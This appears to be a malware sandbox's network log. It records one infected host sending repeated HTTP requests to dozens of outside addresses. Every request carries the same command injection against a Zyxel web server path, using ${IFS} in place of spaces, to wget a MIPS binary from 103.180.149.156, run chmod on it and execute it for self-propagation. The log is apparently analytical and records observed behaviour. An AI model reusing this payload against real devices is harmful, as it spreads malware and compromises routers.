                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631464005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4461192.168.2.1438336122.115.31.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631503105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4462192.168.2.144899049.20.105.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631551027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4463192.168.2.1449678131.61.140.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631582975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4464192.168.2.1456796166.94.65.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631640911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4465192.168.2.1443714129.170.78.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631695032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4466192.168.2.144095069.26.211.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631741047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4467192.168.2.1453324210.163.226.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631789923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4468192.168.2.1441826167.175.198.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631813049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4469192.168.2.1438008171.70.209.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631850004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4470192.168.2.144223251.68.149.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631891966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4471192.168.2.1445648216.206.68.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631937027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4472192.168.2.1450778166.55.91.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631963968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4473192.168.2.145651042.37.86.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.631994009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4474192.168.2.1459856110.221.116.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632030964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4475192.168.2.1442694203.223.108.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632061005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4476192.168.2.1456448217.242.191.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632083893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4477192.168.2.145298214.56.245.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632132053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4478192.168.2.144578017.70.251.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632174969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4479192.168.2.143596414.84.51.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632200003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4480192.168.2.1447070220.217.242.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632256031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4481192.168.2.1436132219.233.159.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632311106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4482192.168.2.14393328.58.230.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632330894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4483192.168.2.1456478203.224.203.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632375956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4484192.168.2.144845036.197.143.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632404089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4485192.168.2.1432922206.167.64.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632453918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4486192.168.2.1442190223.209.159.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632488012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4487192.168.2.1454272109.75.99.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632534027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4488192.168.2.1439576208.47.133.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632561922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4489192.168.2.1440576114.158.98.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632610083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4490192.168.2.145382668.73.165.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632649899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4491192.168.2.144235072.169.116.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632702112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4492192.168.2.144236677.231.169.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632749081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4493192.168.2.143442893.171.52.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632771015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4494192.168.2.1457244190.244.122.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632822037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4495192.168.2.143634695.123.139.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632874012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4496192.168.2.143498442.112.122.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632929087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4497192.168.2.1449244218.90.237.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632953882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4498192.168.2.144076039.115.9.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.632977962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4499192.168.2.1445806203.124.110.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633034945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4500192.168.2.145901635.177.237.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633085966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4501192.168.2.144509823.2.67.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633126974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4502192.168.2.1448956169.252.216.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633187056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4503192.168.2.1453162108.175.170.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633214951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4504192.168.2.1459966162.40.206.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633255005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4505192.168.2.1441144105.194.98.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633296013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4506192.168.2.1445640168.188.239.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633322954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4507192.168.2.14596985.115.230.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633383989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4508192.168.2.144791639.137.47.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633409023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4509192.168.2.1439604178.161.12.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633455992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4510192.168.2.143559071.139.66.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633508921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4511192.168.2.1437188111.22.242.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633531094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4512192.168.2.144366250.48.57.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633563042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4513192.168.2.1439274135.145.106.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633620977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4514192.168.2.1434244165.216.148.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633644104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4515192.168.2.1434922191.253.108.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633712053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4516192.168.2.1439530223.236.97.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633769989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4517192.168.2.14535941.21.119.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633825064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4518192.168.2.1444844205.142.72.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633893967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4519192.168.2.14446729.103.207.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633907080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4520192.168.2.144859879.39.139.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.633961916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4521192.168.2.1443360219.130.194.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634004116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4522192.168.2.1459940183.159.164.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.634036064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4523192.168.2.144099854.51.247.44443
                                                      TimestampBytes transferredDirectionData
